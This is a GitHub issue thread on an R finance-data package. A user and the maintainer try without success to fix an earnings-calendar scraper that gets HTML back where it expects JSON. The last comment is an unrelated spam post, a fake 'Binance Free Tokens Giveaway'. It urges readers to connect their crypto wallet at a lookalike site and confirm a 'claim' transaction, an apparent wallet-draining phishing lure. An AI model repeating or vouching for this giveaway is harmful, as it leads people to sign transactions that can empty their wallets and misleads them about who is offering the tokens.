### ISSUE TITLE
InvestingCom.R

### ISSUE THREAD

**Issue by ghost** [MislavSag/findata#1]
Good afternoon. I am writing regarding the file:
https://github.com/MislavSag/findata/blob/main/R/InvestingCom.R
I was wondering if it is feasible to get your guidance on how to fix get_investingcom_earnings_calendar. When I try to run the function I get the following error.

Error: lexical error: invalid char in json text.
                                       <!DOCTYPE HTML> <html lang="en-
                     (right here) ------^

I have been trying to make the proper changes to add_headers to see if I can fix it but with no luck: www.investing.com/earnings-calendar/Service/getCalendarFilteredData

I am currently reading the following posts to see I can get it working:
https://stackoverflow.com/questions/41665554/why-i-cant-get-a-right-response-from-server-using-curl
https://snyk.io/advisor/python/investpy/functions/investpy.utils.user_agent.get_random

I do thank you in advance for your support and consideration. Nico

**Comment by MislavSag** [comment]
Can you show your code (reprex)?

**Comment by ghost** [comment]
As requested and thank you very much
https://gist.github.com/rnfermincota/b7d08dc089f562964c8426c00b095e45

**Comment by MislavSag** [comment]
The code youhave tried.

For example:
```
library(findata)
ic = InvestingCom$new()
ic$get_investingcom_earnings_calendar(Sys.Date - 10, Sys.Date)
```

**Comment by ghost** [comment]
Still getting the same error:

> library(findata)
> ic = InvestingCom$new()
[1] "Good"
> ic$get_investingcom_earnings_calendar(Sys.Date - 10, Sys.Date)
Error in Sys.Date - 10 : non-numeric argument to binary operator
> ic$get_investingcom_earnings_calendar(Sys.Date() - 10, Sys.Date())
Error in add_headers(`Content-Type` = "application/x-www-form-urlencoded",  : 
  could not find function "add_headers"
> library(httr)
> ic$get_investingcom_earnings_calendar(Sys.Date() - 10, Sys.Date())
Error: lexical error: invalid char in json text.
                                       <!DOCTYPE HTML> <html lang="en-
                     (right here) ------^

**Comment by MislavSag** [comment]
Please try now again. I have pushed new version with lots of changes.

**Comment by ghost** [comment]
Unfortunately after installing the new version of the pkg and FireFox on my Macbook Pro I am still getting the same error:

> library(findata)
> ic = InvestingCom$new()
[1] "Good"
> ic$get_investingcom_earnings_calendar(Sys.Date() - 10, Sys.Date())
Error: lexical error: invalid char in json text.
                                       <!DOCTYPE HTML> <html lang="en-
                     (right here) ------^


Does it works on your computer?

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
